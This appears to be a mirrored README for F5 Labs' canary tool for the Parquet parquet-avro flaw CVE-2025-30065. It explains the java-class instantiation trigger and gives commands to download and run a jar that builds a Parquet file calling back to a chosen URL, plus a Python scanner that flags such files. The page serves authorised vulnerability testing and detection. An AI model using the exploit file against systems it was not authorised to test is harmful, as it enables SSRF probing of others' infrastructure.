## https://sploitus.com/exploit?id=618FEDE0-EDE7-5531-9448-C1E5CB52D355
# Canary Exploit for Parquet CVE-2025-30065
```
(`-. ('-.
_(OO )_ _( OO)
.-----,--(_/ ,. (,------. .-----. .----. .-----..------. .-----. .----. .----. ,--. .------.
' .--.\ \ /(__/| .---' .-')/ ,-. \/ .. \/ ,-. | ___| .-') / -. \/ .. \ / .. \ / .' | ___|
| |('-.\ \ / / | | _( OO'-' | . / \ '-' | | '--. _( OO)'-' _' . / \ . / \ . / -. | '--.
/_) |OO )\ ' /,(| '--(,------. .' /| | ' | .' /`---. '(,------. |_ <| | ' | | ' | .-. '`---. '.
|| |`-'| \ /__)| .--''------.' /__' \ / '.' /__.- | |'------.-. | ' \ / ' \ / ' \ | .- | |
(_' '--'\ \ / | `---. | |\ `' /| | `-' / \ `-' /\ `' / \ `' /\ `' /| `-' /
`-----' `-' `------' `-------' `---'' `-------'`----'' `----'' `---'' `---'' `----' `----''
Canary Exploit Generator - https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065
```
The bare minimum (skip the README instructions at your own risk):
```bash
mkdir -p build/libs
# GitHub "blob" URLs return the HTML viewer page, not the file; "raw" redirects to the jar itself
curl -o build/libs/parquet_canary_exploit-fat.jar \
  -L https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065/raw/main/build/libs/parquet_canary_exploit-fat.jar
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=generate YOUR_CALLBACK_URL
```
## What it is
Compliance folks? AppSec folks? Vuln Management folks? F5 Labs made this for you. This CVE carries a CVSS 10 score, which typically means tight turn-around times. We've bundled the tool as a jar file that generates a parquet file for you. Feed that file to your own systems to determine whether they are vulnerable, which is useful both before and after the fix.
Credit for the [internals of this PoC](https://github.com/mouadk/parquet-rce-poc-CVE-2025-30065/blob/main/src/main/java/com/evil/GenerateMaliciousParquetSSRF.java) goes to [Mouad Kondah](https://www.deep-kondah.com/author/mouad/). Their [writeup dated 2025-04-07](https://www.deep-kondah.com/parquet-under-fire-a-technical-analysis-of-cve-2025-30065/) discusses this CVE and their PoCs.
## How it Works
The parquet file abuses behavior in `parquet-avro` that passes an untrusted Java `String` from the file to the constructor of a class that the file itself names: the Avro schema stored in the Parquet footer metadata can tag a string field with a `java-class` property, and on read the converter loads that class reflectively and calls its `String` constructor with the field value. You supply the callback URL, and when your system reads the parquet file a `javax.swing.JEditorPane` is constructed with that URL, which makes it attempt to fetch the page. This is benign: the callback only proves the class was instantiated; nothing else is executed.
## Demo Video
Want a quick rundown of the canary exploit tool? Watch this two-minute YouTube Short for a live demo: [demo video](https://youtube.com/shorts/vsKv_KayT1E?si=dBTfyIoPKXuXXxT7).
## Vulnerable Configurations
Note that F5 Labs is aware of two vulnerable scenarios for the `parquet-avro` module:
1. Version 1.15.0 and earlier: there was no concept of allow-listing packages for coercing `String` values into other types, so any class on the classpath with a `String` constructor can be named.
2. Version 1.15.1 onwards (at the time of writing), if and only if the system property `org.apache.parquet.avro.SERIALIZABLE_PACKAGES` has been set to something permissive, e.g. `*`, on the JVM that reads the file.
In both cases the file only fires when it is read through `parquet-avro` (for example `AvroParquetReader`); a backend that reads Parquet with a different library will not call back even if a vulnerable `parquet-avro` jar sits somewhere on its classpath.
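The two sections above (the `java-class` mechanism in "How it Works" and the package allowlist in "Vulnerable Configurations") can be turned into a file-side triage check. The following is an added example, not part of the F5 Labs tool or of `parquet-avro`: a Python scanner that pulls the footer out of a Parquet file, looks for an embedded `parquet.avro.schema` whose string fields carry a `java-class` property, and compares each class against a package allowlist modelled on `SERIALIZABLE_PACKAGES`. The footer is a Thrift-encoded `FileMetaData` struct; this scanner regex-scans the raw bytes rather than decoding it, so it is a fast pre-filter, not a parser. The default allowlist, the sample schemas and the `build_sample` helper are constructed for the example (the samples are not real Parquet files and a real reader would reject them).

```python
"""Heuristic triage scanner for Parquet files carrying a parquet-avro java-class hint.

Added example, not part of the F5 Labs canary tool or of parquet-avro.
"""
import json
import re
import struct
import sys
from typing import Dict, List, Sequence

MAGIC = b"PAR1"

# Assumption: the default of org.apache.parquet.avro.SERIALIZABLE_PACKAGES in 1.15.1+.
# Replace with whatever your reading JVM actually runs with; "*" means allow everything.
DEFAULT_ALLOWED_PACKAGES: Sequence[str] = (
    "java.lang", "java.math", "java.io", "java.net", "org.apache.parquet.avro",
)

# Avro's Schema.toString() writes compact JSON, so the property appears verbatim inside
# the footer's key/value metadata; surrounding whitespace is tolerated anyway.
JAVA_CLASS_RE = re.compile(rb'"java-class"\s*:\s*"([^"]+)"')


def read_footer(data: bytes) -> bytes:
    """Return the raw footer bytes using the trailer layout: <footer><u32 len>PAR1."""
    if len(data) < 12 or data[:4] != MAGIC or data[-4:] != MAGIC:
        raise ValueError("not a Parquet file (PAR1 magic missing)")
    (footer_len,) = struct.unpack("<I", data[-8:-4])
    if footer_len > len(data) - 12:
        raise ValueError("footer length exceeds file size")
    return data[-8 - footer_len:-8]


def find_java_classes(footer: bytes) -> List[str]:
    """Every class name referenced by a java-class property in the footer bytes."""
    return [m.group(1).decode("utf-8", "replace") for m in JAVA_CLASS_RE.finditer(footer)]


def is_allowed(class_name: str, allowed: Sequence[str] = DEFAULT_ALLOWED_PACKAGES) -> bool:
    """Package-prefix allowlist check; '*' permits anything (approximation of the JVM check)."""
    if "*" in allowed:
        return True
    return any(class_name.startswith(pkg + ".") for pkg in allowed)


def triage(data: bytes, allowed: Sequence[str] = DEFAULT_ALLOWED_PACKAGES) -> Dict[str, object]:
    """Scan one in-memory file image; 'flagged' lists classes outside the allowlist."""
    classes = find_java_classes(read_footer(data))
    flagged = [c for c in classes if not is_allowed(c, allowed)]
    return {"java_classes": classes, "flagged": flagged, "suspicious": bool(flagged)}


def build_sample(avro_schema: dict) -> bytes:
    """Construct a file image with the given Avro schema JSON embedded in the footer.

    Only the trailer framing is real; the column chunk and the Thrift encoding of
    FileMetaData are stand-ins, which is all this byte-level scanner needs.
    """
    footer = b"\x00parquet.avro.schema\x00" + json.dumps(avro_schema).encode() + b"\x00"
    return MAGIC + b"\x00" * 16 + footer + struct.pack("<I", len(footer)) + MAGIC


# Constructed sample schemas: the canary shape described on this page, and a
# legitimate use of java-class for a stringable java.math type.
CANARY_SCHEMA = {
    "type": "record", "name": "Canary", "namespace": "example",
    "fields": [{"name": "url",
                "type": {"type": "string", "java-class": "javax.swing.JEditorPane"}}],
}
BENIGN_SCHEMA = {
    "type": "record", "name": "Invoice", "namespace": "example",
    "fields": [{"name": "amount",
                "type": {"type": "string", "java-class": "java.math.BigDecimal"}}],
}

if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        # No files given: run the constructed samples so the script demonstrates itself.
        print("canary sample:", triage(build_sample(CANARY_SCHEMA)))
        print("benign sample:", triage(build_sample(BENIGN_SCHEMA)))
    for path in paths:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

Run it as `python3 scan.py incoming/*.parquet` on files before they reach a `parquet-avro` reader. A hit is a lead, not proof: `java-class` has legitimate uses for stringable types, which is why the allowlist comparison matters, and a file with no Avro schema in its footer scores clean here while still being worth the canary test against the actual backend.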
## Gotchas
You can point the callback at anything your system can egress to over DNS and/or HTTP(S). If you have no egress of either kind to the internet at large, use something reachable inside your data center for which you can obtain DNS or HTTP access logs. Getting this wrong produces a false negative: the class is instantiated but you never see the evidence. Highly irregular settings for `org.apache.parquet.avro.SERIALIZABLE_PACKAGES` might conceivably cause a false negative as well; see the previous section.
## Using the Canary Exploit Generator
You are encouraged to read and understand the code and build it for yourself. We provide the distribution build of the code as a jar within this repository for your convenience.
### Obtaining the Java JDK
You will need JDK 21 or later to build or run the generator (search terms like "OpenJDK21 install" may help here). If you are familiar with installing the JDK, these are shortcuts:
* macOS: `brew install openjdk@21`
* Ubuntu/Debian: `sudo apt install openjdk-21-jdk`
* Red Hat: `sudo yum install java-21-openjdk`
* Windows: https://learn.microsoft.com/en-us/java/openjdk/install
### Obtaining the Distribution Jar
You can either download the jar, or clone the repo.
#### Downloading the Distribution Jar
```bash
mkdir -p build/libs
# GitHub "blob" URLs return the HTML viewer page, not the file; "raw" redirects to the jar itself
curl -o build/libs/parquet_canary_exploit-fat.jar \
  -L https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065/raw/main/build/libs/parquet_canary_exploit-fat.jar
```
#### Cloning this Github Repository
```bash
git clone https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065.git
cd parquet-canary-exploit-rce-poc-CVE-2025-30065
```
#### Verifying your Distribution Jar
```bash
file build/libs/parquet_canary_exploit-fat.jar
# shasum prints SHA-1 by default; use `shasum -a 256` if your policy requires SHA-256
shasum build/libs/parquet_canary_exploit-fat.jar
```
Expected output (if `file` reports an HTML document instead of a Zip archive, you downloaded GitHub's viewer page rather than the jar; re-check the URL):
```bash
build/libs/parquet_canary_exploit-fat.jar: Zip archive data, at least v1.0 to extract, compression method=deflate
19ae361d589a9cd476bee31ba3f437094a8a6440 build/libs/parquet_canary_exploit-fat.jar
```
### Get Usage Help
```bash
java -jar build/libs/parquet_canary_exploit-fat.jar -h
```
Expected output:

### Generate the Canary Exploit File
First, decide what `YOUR_CALLBACK_URL` will be. You need to be able to detect when your parquet-processing backend either resolves the hostname in the URL or requests the URL from the web server. canarytokens.org "Web bug" or "DNS" tokens work for this. See the Gotchas section above for details.
Run this command:
```bash
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=generate YOUR_CALLBACK_URL
```
This will generate `poc.parquet`. Verify like so:
```bash
file poc.parquet
```
This should output:
```bash
poc.parquet: Apache Parquet
```
This file can now be fed into your system. If your system is vulnerable, you will receive a callback. See also the Gotchas section.
### Test the Canary Exploit File
For convenience, this mode also generates the file if it does not already exist.
```bash
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=test YOUR_CALLBACK_URL
```
### Test the Canary Exploit Locally
```bash
python3 -m http.server --bind 127.0.0.1 9090 &   # logs every request it receives, so the callback shows up here
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=test http://localhost:9090
kill $!   # stop the background listener when you are done
```
See `CanaryExploitGenerator.testParquetFile()` for how the parquet file is read. This is what code in the depths of your system will look like:
```java
// imports: org.apache.avro.generic.GenericRecord, org.apache.parquet.avro.AvroParquetReader,
//          org.apache.parquet.hadoop.ParquetReader, org.apache.parquet.io.InputFile
try (ParquetReader<GenericRecord> reader = AvroParquetReader.<GenericRecord>builder(inputFile).build()) {
    // reading the first record is enough to trigger the construction of javax.swing.JEditorPane
    GenericRecord record = reader.read();
}
```
## Disclaimer
This tool is intended for use in authorized security testing settings only. Know the laws for applicable jurisdiction(s). See LICENSE.md for legal details.